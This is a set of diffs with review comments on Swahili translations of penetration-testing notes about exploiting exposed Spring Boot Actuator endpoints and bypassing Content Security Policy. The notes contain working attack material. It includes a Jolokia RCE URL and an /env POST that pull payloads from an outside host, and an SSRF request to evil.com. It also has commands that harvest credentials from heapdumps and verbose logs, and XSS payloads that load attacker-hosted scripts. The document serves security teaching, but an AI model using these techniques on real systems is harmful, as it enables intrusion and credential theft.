- Spring Boot Actuators hujisajili endpoints kama `/health`, `/trace`, `/beans`, `/env`, n.k. Katika matoleo 1 mpaka 1.4, endpoints hizi zinapatikana bila authentication. Kuanzia toleo 1.5 na baadaye, `/health` na `/info` zinaonekana kukosa usiri kwa default, lakini mara nyingi developers huzimia usalama huu.
- Endpoint fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, na `/heapdump`.
- Katika Spring Boot 1.x, actuators hujisajili chini ya root URL, wakati kwenye 2.x, ziko chini ya base path ya `/actuator/`.
- Spring Boot Actuators register endpoints such as `/health`, `/trace`, `/beans`, `/env`, etc. Katika toleo 1 hadi 1.4, endpoints hizi zinaweza kupatikana bila uthibitisho. Kuanzia toleo 1.5 na baadaye, `/health` na `/info` pekee ndizo zisizo hatarishi kwa chaguo-msingi, lakini watengenezaji mara nyingi hufuta usalama huu.
- Endpoints fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, and `/heapdump`.
- Katika Spring Boot 1.x, actuators zinajiandikisha chini ya root URL, wakati katika 2.x, ziko chini ya base path ya `/actuator/`.
### **Mbinu za Kuchukua Fursa:**
### **Exploitation Techniques:**
1. **Remote Code Execution via '/jolokia'**:
- Endpoint ya `/jolokia` actuator inaonyesha maktaba ya Jolokia, ambayo inaruhusu upatikanaji wa MBeans kupitia HTTP.
- Kitendo cha `reloadByURL` kinaweza kutumika kupakia upya usanidi wa logging kutoka URL ya nje, ambayo inaweza kusababisha blind XXE au Remote Code Execution kupitia usanidi wa XML uliotengenezwa.
- Mfano wa exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
- The `/jolokia` actuator endpoint exposes the Jolokia Library, ambayo inaruhusu upatikanaji wa MBeans kwa kupitia HTTP.
- The `reloadByURL` action inaweza kutumika kwa kureload configuration za logging kutoka kwenye URL ya nje, jambo ambalo linaweza kusababisha blind XXE au Remote Code Execution kupitia XML zilizotengenezwa mahsusi.
- Example exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Config Modification via '/env'**:
- Ikiwa Spring Cloud Libraries zipo, endpoint ya `/env` inaruhusu urekebishaji wa properties za mazingira.
- Properties zinaweza kudhibitiwa ili kuchukua fursa za udhaifu, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
- Mfano wa POST request ya exploit:
- Ikiwa Spring Cloud Libraries zipo, endpoint ya `/env` inaruhusu mabadiliko ya properties za mazingira.
- Properties zinaweza kubadilishwa ili kutilia mtego udhaifu mbalimbali, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
- Example exploit POST request:
```
POST /env HTTP/1.1
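Review bot: the new line `**Angalia chapisho la awali kutoka** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]` drops the escaping the old line had (`\[**...**]`) but still supplies no link target, so it renders as literal bracketed text instead of a hyperlink; write it as `[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)`. Several new lines in this hunk also switch language mid-sentence ("Spring Boot Actuators register endpoints such as `/health`, `/trace`, `/beans`, `/env`, etc. Katika toleo 1 hadi 1.4 ...", "The `/jolokia` actuator endpoint exposes the Jolokia Library, ambayo inaruhusu ...", "The `reloadByURL` action inaweza kutumika ..."); either translate the whole sentence or keep only identifiers and product names in English, as the old lines did. The headings "Kutumia Spring Boot Actuators" and "Mbinu za Kuchukua Fursa" are reverted to English in the same hunk, so state the convention once (technical headings stay English) and apply it across the file. The `/jolokia` `reloadByURL` URL and the `/env` POST body are carried over unchanged, which is right.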
@ -40,32 +40,32 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Other Useful Settings**:
- Properties kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kudhibitiwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
3. **Other Useful Settings:**
- Properties kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kubadilishwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
### **Taarifa Zaidi:**
### **Taarifa za Ziada:**
- Orodha kamili ya default actuators inaweza kupatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Endpoint ya `/env` katika Spring Boot 2.x inatumia JSON format kwa ajili ya mabadiliko ya property, lakini kanuni ya jumla inabaki ile ile.
- Orodha kamili ya actuators chaguo-msingi inapatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- The `/env` endpoint katika Spring Boot 2.x inatumia muundo wa JSON kwa mabadiliko ya property, lakini dhana kuu inabaki ile ile.
### **Mada Zinazohusiana:**
1.  **Env + H2 RCE**:
- Maelezo juu ya kuchukua fursa ya mchanganyiko wa endpoint ya `/env` na database ya H2 yanapatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
- Maelezo juu ya kutumia mchanganyiko wa endpoint ya `/env` na database ya H2 yanapatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2.  **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- Uendeshaji wa framework ya Spring wa matrix parameters (`;`) katika pathnames za HTTP unaweza kutumiwa kwa Server-Side Request Forgery (SSRF).
- Mfano wa ombi la exploit:
- Jinsi framework ya Spring inavyoshughulikia matrix parameters (`;`) katika pathnames za HTTP inaweza kutumika kwa Server-Side Request Forgery (SSRF).
- Example exploit request:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
## Kuchimba siri za HeapDump (credentials, tokens, internal URLs)
## HeapDump secrets mining (credentials, tokens, internal URLs)
Ikiwa `/actuator/heapdump` inapatikana, kawaida unaweza kupata snapshot kamili ya heap ya JVM ambayo mara nyingi ina siri hai (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
Ikiwa `/actuator/heapdump` imefunuliwa, kwa kawaida unaweza kupata snapshot kamili ya JVM heap ambayo mara nyingi ina siri zinazoishi (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
- Pakua na uchambuzi wa haraka:
- Download and quick triage:
```bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
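Review bot: the new line "The `/env` endpoint katika Spring Boot 2.x inatumia muundo wa JSON kwa mabadiliko ya property ..." is again half English and half Swahili, and it is the only sentence telling the reader that the form-encoded `eureka.client.serviceUrl.defaultZone=...` POST shown above is the 1.x shape while 2.x expects JSON, so keep it in one language. The bullets "Example exploit request:" and "Download and quick triage:" are reverted to plain English although the prose around them ("Ikiwa `/actuator/heapdump` imefunuliwa ...") stays Swahili. "siri zinazoishi" for "live secrets" is a literal rendering; the old "siri hai" reads naturally. The SSRF request `GET ;@evil.com/url HTTP/1.1` and the heapdump `wget`/`strings` triage are unchanged, which is fine.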
@ -74,7 +74,7 @@ strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.dat
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
```
- Uchambuzi wa undani zaidi kwa kutumia VisualVM na OQL:
- Deeper analysis with VisualVM and OQL:
- Fungua heapdump katika VisualVM, chunguza instances za `java.lang.String` au endesha OQL kutafuta siri:
```
select s.toString()
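Review bot: "Deeper analysis with VisualVM and OQL:" reverts the lead bullet to English while its sub-bullet "Fungua heapdump katika VisualVM, chunguza instances za `java.lang.String` au endesha OQL kutafuta siri:" stays Swahili, so the list now alternates language line by line; keep the lead bullet in the same language as its child. The OQL query itself is untouched and correct as a `select ... from java.lang.String s where /.../i.test(s.toString())` filter.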
@ -82,24 +82,24 @@ from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
- Uondoaji wa moja kwa moja kwa JDumpSpider:
- Automated extraction with JDumpSpider:
```bash
java -jar JDumpSpider-*.jar heapdump
```
Matokeo yenye thamani ya juu kwa kawaida:
- Spring `DataSourceProperties` / `HikariDataSource` objects exposing `url`, `username`, `password`.
- `OriginTrackedMapPropertySource` entries revealing `management.endpoints.web.exposure.include`, service ports, and embedded Basic-Auth in URLs (e.g., Eureka `defaultZone`).
- Plain HTTP request/response fragments including `Authorization: Basic ...` captured in memory.
Matokeo ya kawaida yenye thamani kubwa:
- Spring `DataSourceProperties` / `HikariDataSource` objects zinazoonyesha `url`, `username`, `password`.
- `OriginTrackedMapPropertySource` entries zinazoonyesha `management.endpoints.web.exposure.include`, ports za huduma, na Basic-Auth iliyojazwa ndani ya URLs (mfano, Eureka `defaultZone`).
- Vipande vya kawaida vya HTTP request/response vinavyojumuisha `Authorization: Basic ...` vilivyokamatwa ndani ya memory.
Vidokezo:
- Tumia wordlist inayolenga Spring ili kugundua actuator endpoints kwa haraka (mfano, SecLists spring-boot.txt) na kila mara angalia kama `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, na `/actuator/configprops` pia zinapatikana.
- Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), kwa hiyo jaribu kwa upana.
Tips:
- Tumia wordlist inayolenga Spring kugundua actuator endpoints haraka (mfano, SecLists spring-boot.txt) na hakikisha kila mara kama `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, na `/actuator/configprops` pia zimefunuliwa.
- Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma za jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), hivyo vijaribu kwa upana.
## Kutumia vibaya Actuator loggers/logging ili capture credentials
## Kutumia vibaya Actuator loggers/logging kushika credentials
Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` inapatikana, unaweza kuinua kwa nguvu viwango vya log hadi DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Imeunganishwa na logs zinazoweza kusomwa (kupitia `/actuator/logfile` au njia za log zinazojulikana), hii inaweza leak credentials zilizowasilishwa wakati wa mchakato wa login (mfano, Basic-Auth headers au vigezo vya fomu).
Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` imefunuliwa, unaweza kwa nguvu kuongeza viwango vya logi kwa njia ya dynamic kuwa DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Ikichanganywa na logi zinazoweza kusomwa (kupitia `/actuator/logfile` au njia za logi zinazoeleweka), hii inaweza leak credentials zilizowasilishwa wakati wa login flows (mfano, Basic-Auth headers au form parameters).
- Orodhesha na ongeza viwango vya log vya nyeti:
- Enumerate and crank up sensitive loggers:
```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
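Review bot: this hunk moves in both directions at once: the three findings bullets ("Spring `DataSourceProperties` / `HikariDataSource` objects ...", "`OriginTrackedMapPropertySource` entries ...", "Plain HTTP request/response fragments ...") are translated into Swahili, but the labels "Automated extraction with JDumpSpider:", "Tips:" and the bullet "Enumerate and crank up sensitive loggers:" are reverted to English directly above Swahili bullets. Pick one rule for labels that introduce a code block. The list of extra endpoints to check (`/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, `/actuator/configprops`) and the `curl -s http://target/actuator/loggers | jq .` enumeration are carried over intact.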
@ -113,7 +113,7 @@ curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
```
- Tafuta mahali logs zinaandikwa na kusanya:
- Find where logs are written and harvest:
```bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
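Review bot: "Find where logs are written and harvest:" is reverted to English like the sibling bullet above it, while the paragraph introducing the whole list ("Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` imefunuliwa ...") remains Swahili; if the intent is English labels above every code block, say so in the commit message so the next translation pass does not flip them back. The `curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='` line is unchanged.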
@ -122,13 +122,13 @@ curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|user
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
- Sababisha trafiki ya login/authentication na changanua log kwa creds. Katika mipangilio ya microservice yenye gateway mbele ya auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi huonyesha headers na bodies za fomu. Baadhi ya mazingira hata hutengeneza trafiki ya login ya synthetic kwa vipindi, na kufanya ukusanyaji kuwa rahisi mara logging inapokuwa verbose.
- Trigger login/authentication traffic and parse the log for creds. Katika setups za microservice zenye gateway inayokinga auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi hufanya headers na bodies za form kuwa zinazoonekana. Baadhi ya mazingira hata huunda synthetic login traffic kwa vipindi, hivyo kusanya kwa urahisi mara logging inapokuwa verbose.
Vidokezo:
- Rejesha viwango vya log ukimaliza: `POST /actuator/loggers/<logger>` na `{ "configuredLevel": null }`.
- Ikiwa `/actuator/httpexchanges` inapatikana, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha sensitive headers.
Notes:
- Rudisha viwango vya logi ukimaliza: `POST /actuator/loggers/<logger>` ukiweka `{ "configuredLevel": null }`.
- Ikiwa `/actuator/httpexchanges` imefunuliwa, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha headers zenye nyeti.
## Marejeleo
## References
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
- [VisualVM](https://visualvm.github.io/)
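Review bot: "Trigger login/authentication traffic and parse the log for creds. Katika setups za microservice zenye gateway inayokinga auth ..." switches language after the first sentence; translate both halves or neither. "gateway inayokinga auth" (a gateway that shields auth) also drifts from the old "gateway mbele ya auth" (a gateway in front of the auth service), which is the topology that makes gateway TRACE logging show the credentials. "Notes:" and "## References" are reverted to English in the same hunk where "Rudisha viwango vya logi ukimaliza" is translated; the old "## Marejeleo" shows this file previously translated headings, so the commit should state the convention. The cleanup step (`POST /actuator/loggers/<logger>` with `{ "configuredLevel": null }`) is the right thing to keep; consider placing it before the harvesting steps so it is not skipped.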
@ -4,28 +4,28 @@
## CSP ni nini
Content Security Policy (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolenga kwa msingi wa **kuzuia mashambulizi kama cross-site scripting (XSS)**. Inafanya kazi kwa kufafanua na kueleza njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha aina mbalimbali za vipengele kama picha, frames, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kwa domaini ileile (self), ikiwa ni pamoja na rasilimali za inline na utekelezaji wa msimbo wa string kupitia functions kama `eval`, `setTimeout`, au `setInterval`.
Content Security Policy (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolengwa hasa **kuzuia mashambulizi kama cross-site scripting (XSS)**. Inafanya kazi kwa kuainisha na kubainisha njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vipengele mbalimbali kama picha, frames, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka domaini hiyo hiyo (self), ikiwa ni pamoja na rasilimali za inline na utekelezaji wa msimbo wa string kupitia funguo kama `eval`, `setTimeout`, au `setInterval`.
Utekelezaji wa CSP unafanywa kupitia **response headers** au kwa kuingiza **meta elements into the HTML page**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa hiari na huzuia papo hapo uvunjaji wowote unaogundulika.
Utekelezaji wa CSP hufanywa kupitia **vichwa vya majibu** au kwa kuingiza **vipengele vya meta kwenye ukurasa wa HTML**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa nguvu na huzuia mara moja ukiukaji wowote unaogundulika.
- Imewekwa kupitia response header:
- Imewekwa kupitia vichwa vya majibu:
```
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
- Imefanywa kwa kutumia meta tag:
Imetekelezwa kupitia tagi ya meta:
```xml
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### Vichwa
CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa vifuatavyo:
CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:
- `Content-Security-Policy`: Inatekeleza CSP; kivinjari kinazuia ukiukaji wowote.
- `Content-Security-Policy-Report-Only`: Imetumika kwa ufuatiliaji; inaripoti ukiukaji bila kuzuia. Inafaa kwa majaribio katika mazingira ya kabla ya uzalishaji.
- `Content-Security-Policy`: Inatekeleza CSP; browser inazuia ukiukaji wowote.
- `Content-Security-Policy-Report-Only`: Inatumika kwa ufuatiliaji; inaripoti ukiukaji bila kuzuia. Inafaa kwa upimaji katika mazingira ya kabla ya uzalishaji.
### Kufafanua Rasilimali
CSP inazuia asili za kupakia maudhui zote za active na passive, ikidhibiti vipengele kama utekelezaji wa inline JavaScript na matumizi ya `eval()`. Mfano wa sera ni:
CSP inapunguza vyanzo vya kupakia maudhui hai na pasivu, ikidhibiti vipengele kama utekelezaji wa JavaScript inline na matumizi ya `eval()`. Mfano wa sera ni:
```bash
default-src 'none';
img-src 'self';
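Review bot: "funguo kama `eval`, `setTimeout`, au `setInterval`" renders "functions" as "funguo" (keys), which is wrong; keep "functions" as the old line did, or use "kazi". The second list item lost its bullet: "Imetekelezwa kupitia tagi ya meta:" no longer starts with "- " while its sibling "- Imewekwa kupitia vichwa vya majibu:" does, so the two-item list breaks in rendering. The same hunk translates "response headers" and "meta elements" literally ("vichwa vya majibu", "vipengele vya meta") but leaves "meta tag", "browser" and "CSP" in English; the rest of the file keeps such terms in English, so prefer that. The example header `Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';` and the `<meta http-equiv="Content-Security-Policy" ...>` line are unchanged.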
@ -37,39 +37,39 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
### Directives
### Maelekezo
- **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URLs, scripts za inline, na scripts zinazochochewa na event handlers au XSLT stylesheets.
- **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikijumuisha URLs, scripts za inline, na scripts zinazosababishwa na event handlers au XSLT stylesheets.
- **default-src**: Inaweka sera ya msingi ya kupata rasilimali wakati maelekezo maalum ya fetch hayapo.
- **child-src**: Inaeleza vyanzo vinavyoruhusiwa kwa web workers na maudhui yaliyowekwa ndani ya frames.
- **connect-src**: Inazuia URLs zinazoweza kupakuliwa kupitia interfaces kama fetch, WebSocket, XMLHttpRequest.
- **frame-src**: Inaweka vikwazo kwa URLs zinazotumiwa na frames.
- **frame-ancestors**: Inaeleza vyanzo vinavyoweza kuingiza ukurasa wa sasa, inafaa kwa elementi kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
- **img-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa picha.
- **font-src**: Inaeleza vyanzo vyenye uhalali kwa fonts zinazopakuliwa kutumia `@font-face`.
- **manifest-src**: Inaelekeza vyanzo vinavyoruhusiwa vya application manifest files.
- **media-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
- **object-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa elementi `<object>`, `<embed>`, na `<applet>`.
- **base-uri**: Inaeleza URLs zinazoruhusiwa kupakiwa kwa kutumia elementi `<base>`.
- **form-action**: Inaorodhesha endpoints halali kwa uwasilishaji wa fomu.
- **plugin-types**: Inazuia mime types ambazo ukurasa unaweza kuitisha.
- **child-src**: Inabainisha vyanzo vinavyoruhusiwa kwa web workers na yaliyomo ndani ya embedded frames.
- **connect-src**: Inaweka kikomo kwa URLs zinazoweza kupakiwa kwa kutumia interfaces kama fetch, WebSocket, XMLHttpRequest.
- **frame-src**: Inaweka kikomo kwa URLs kwa frames.
- **frame-ancestors**: Inabainisha vyanzo vinavyoweza kuingiza ukurasa wa sasa, inafaa kwa elementi kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
- **img-src**: Inafafanua vyanzo vinavyoruhusiwa kwa picha.
- **font-src**: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia `@font-face`.
- **manifest-src**: Inafafanua vyanzo vinavyoruhusiwa vya application manifest files.
- **media-src**: Inafafanua vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
- **object-src**: Inafafanua vyanzo vinavyoruhusiwa kwa elementi `<object>`, `<embed>`, na `<applet>`.
- **base-uri**: Inabainisha URLs zinazoruhusiwa kwa matumizi ya elementi `<base>`.
- **form-action**: Inaorodhesha endpoints halali za kuwasilisha forms.
- **plugin-types**: Inakataza mime types ambazo ukurasa unaweza kuwaita.
- **upgrade-insecure-requests**: Inaelekeza browsers kuandika upya URLs za HTTP kuwa HTTPS.
- **sandbox**: Inatekeleza vikwazo vinavyofanana na attribute ya sandbox ya `<iframe>`.
- **report-to**: Inaeleza kundi ambalo ripoti itatumwa ikiwa sera itavunjwa.
- **worker-src**: Inaeleza vyanzo halali kwa scripts za Worker, SharedWorker, au ServiceWorker.
- **prefetch-src**: Inaeleza vyanzo halali kwa rasilimali ambazo zitawekwa au kuprefetcha.
- **navigate-to**: Inazuia URLs ambazo dokumenti inaweza kusogea kwa njia yoyote (a, form, window.location, window.open, n.k.)
- **sandbox**: Inaweka vikwazo vinavyofanana na attribute ya sandbox ya `<iframe>`.
- **report-to**: Inabainisha kundi ambalo ripoti itatumwa kwa likitendeka kosa la sera.
- **worker-src**: Inabainisha vyanzo halali kwa Worker, SharedWorker, au ServiceWorker scripts.
- **prefetch-src**: Inabainisha vyanzo halali kwa rasilimali ambazo zitatamuliwa au kufahamishwa kabla.
- **navigate-to**: Inaweka kikomo kwa URLs ambazo hati inaweza kuvinjari kwa njia yoyote (a, form, window.location, window.open, nk.)
### Sources
### Vyanzo
- `*`: Inaruhusu URLs zote isipokuwa zile zenye schemes `data:`, `blob:`, `filesystem:`.
- `'self'`: Inaruhusu kupakia kutoka domain ile ile.
- `'data'`: Inaruhusu rasilimali kupakiwa kupitia data scheme (mfano, picha zilizoencoded kwa Base64).
- `'none'`: Inazuia upakiaji kutoka chanzo chochote.
- `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, haitokiwi kwa sababu za usalama.
- `*`: Inaruhusu URLs zote isipokuwa zile zenye scheme `data:`, `blob:`, `filesystem:`.
- `'self'`: Inaruhusu kupakia kutoka domain ileile.
- `'data'`: Inaruhusu rasilimali kupakiwa kupitia data scheme (mfano, picha zilizofichwa kwa Base64).
- `'none'`: Inazuia kupakia kutoka kwa chanzo chochote.
- `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na mbinu zinazofanana, haipendekezwi kwa sababu za usalama.
- `'unsafe-hashes'`: Inawezesha event handlers maalum za inline.
- `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za inline kama `<script>` au `<style>` za inline, haitakiwa kwa sababu za usalama.
- `'nonce'`: Whitelist kwa scripts maalum za inline zinazotumia nonce ya kriptografia (nambari inayotumika mara moja).
- `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za inline kama `<script>` au `<style>` za inline, haipendekezwi kwa sababu za usalama.
- `'nonce'`: Orodha nyeupe kwa scripts maalum za inline zinazotumia nonce ya cryptographic (nambari inayotumika mara moja).
- If you have JS limited execution it's possible to get a used nonce inside the page with `doc.defaultView.top.document.querySelector("[nonce]")` and then reuse it to load a malicious script (if strict-dynamic is used, any allowed source can load new sources so this isn't needed), like in:
<details>
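Review bot: "**plugin-types**: Inakataza mime types ambazo ukurasa unaweza kuwaita" changes the meaning from "restricts" (old: "Inazuia") to "forbids"; the directive names the MIME types that are allowed, so "Inaweka kikomo kwa mime types ..." (the phrasing this hunk already uses for `connect-src` and `frame-src`) is the right verb. "**prefetch-src**: ... rasilimali ambazo zitatamuliwa au kufahamishwa kabla" is garbled ("zitatamuliwa" is not a word); the old "zitawekwa au kuprefetcha", or simply "prefetched au prerendered", is clearer. "`'data'`: ... picha zilizofichwa kwa Base64" says "hidden", not "encoded"; keep "zilizoencoded" as before. "`'nonce'`: Orodha nyeupe ..." translates "whitelist" while the `'sha256-<hash>'` and `'strict-dynamic'` entries in the next hunk keep "whitelist"; pick one. The directive and source lists are otherwise the same entries as before, and the `doc.defaultView.top.document.querySelector("[nonce]")` context line is untouched.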
@ -88,18 +88,18 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
```
</details>
- `'sha256-<hash>'`: Inaweka scripts kwenye orodha nyeupe ambazo zina hash maalum ya sha256.
- `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka chanzo chochote ikiwa zimewekwa kwenye orodha nyeupe kwa nonce au hash.
- `'host'`: Inaelekeza host maalum, kama `example.com`.
- `https:`: Inapunguza URLs kwa zile zinazotumia HTTPS.
- `blob:`: Inaruhusu rasilimali kupakiwa kutoka Blob URLs (kwa mfano, Blob URLs zilizotengenezwa kupitia JavaScript).
- `filesystem:`: Inaruhusu rasilimali kupakiwa kutoka filesystem.
- `'report-sample'`: Inajumuisha sampuli ya msimbo uliokiuka katika ripoti ya ukiukaji (inayosaidia debugging).
- `'strict-origin'`: Fanana na 'self' lakini inahakikisha ngazi ya usalama ya protocol ya vyanzo inalingana na nyaraka (tu origins salama zinaweza kupakia rasilimali kutoka origins salama).
- `'strict-origin-when-cross-origin'`: Inatuma URL kamili wakati wa kufanya maombi ya same-origin lakini inatuma tu origin wakati ombi ni cross-origin.
- `'unsafe-allow-redirects'`: Inaruhusu rasilimali kupakiwa ambazo zitatoa redirect mara moja kwa rasilimali nyingine. Haipendekezi kwani inapunguza usalama.
- `'sha256-<hash>'`: Inaweka scripts kwenye whitelist zilizo na sha256 hash maalum.
- `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka kwa chanzo chochote ikiwa zimewekwa kwenye whitelist kwa kutumia nonce au hash.
- `'host'`: Inaelezea host maalum, kama `example.com`.
- `https:`: Inaruhusu tu URLs zinazotumia HTTPS.
- `blob:`: Inaruhusu resources kupakiwa kutoka Blob URLs (mfano, Blob URLs zilizoundwa kwa JavaScript).
- `filesystem:`: Inaruhusu resources kupakiwa kutoka filesystem.
- `'report-sample'`: Inajumuisha sampuli ya code inayokiuka katika ripoti ya ukiukaji (inayosaidia debugging).
- `'strict-origin'`: Inafanana na 'self' lakini ina hakikisha ngazi ya usalama ya protocol ya vyanzo inalingana na ile ya hati (tu secure origins zinaweza kupakia resources kutoka secure origins).
- `'strict-origin-when-cross-origin'`: Inatuma URLs kamili wakati wa maombi ya same-origin lakini inatuma tu origin wakati ombi ni cross-origin.
- `'unsafe-allow-redirects'`: Inaruhusu resources kupakiwa ambazo zitabadilisha mwelekeo mara moja kwenda resource nyingine. Haipendekezwi kwa kuwa inapunguza usalama.
## Sheria za CSP Zisizo Salama
## Kanuni za CSP zisizo salama
### 'unsafe-inline'
```yaml
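Review bot: "ina hakikisha" in the `'strict-origin'` entry should be one word, "inahakikisha". More importantly, the `'strict-origin'` and `'strict-origin-when-cross-origin'` entries, which this hunk only re-words, describe when a full URL versus only the origin is sent along with a request; that is referrer behaviour, not something a CSP source expression decides, and none of the neighbouring entries (`'self'`, `'nonce'`, `'sha256-<hash>'`, `https:`, `blob:`) works that way. Rather than re-translating them, drop the two entries or move them to a Referrer-Policy section. The `'unsafe-allow-redirects'` wording ("zitabadilisha mwelekeo mara moja kwenda resource nyingine") is fine.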
@ -127,7 +127,7 @@ Payload inayofanya kazi:
```
### strict-dynamic
Ikiwa kwa namna fulani unaweza kusababisha **allowed JS code created a new script tag** kwenye DOM kwa kutumia JS yako, kwa sababu script iliyoruhusiwa ndiyo inayoiunda, basi **new script tag will be allowed to be executed**.
Ikiwa kwa njia yoyote unaweza kusababisha **JS iliyoruhusiwa kuunda tag mpya ya script** kwenye DOM kwa JS yako, kwa sababu script iliyoruhusiwa inaiunda, basi **tag mpya ya script itaruhusiwa kutekelezwa**.
### Wildcard (\*)
```yaml
@ -138,7 +138,7 @@ Payload inayofanya kazi:
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
### Kukosa object-src na default-src
> [!CAUTION] > **Inaonekana hii haifanyi kazi tena**
```yaml
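Review bot: "### Kukosa object-src na default-src" translates a heading into Swahili in the same commit that reverts "## References", "### Exploitation Techniques" and "### Directives" to English; decide per file whether section headings are translated and apply it in one direction. The wildcard payloads `"/>'><script src=https://attacker-website.com/evil.js></script>` and the `data:text/javascript,alert(1337)` variant, and the `> [!CAUTION]` note that the object-src trick no longer works, are left intact, which is correct.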
@ -156,28 +156,28 @@ Content-Security-Policy: script-src 'self';  object-src 'none' ;
```
Ikiwa unaweza kupakia faili ya JS, unaweza bypass CSP hii:
Payload inayofanya kazi:
Working payload:
```html
"/>'><script src="/uploads/picture.png.js"></script>
```
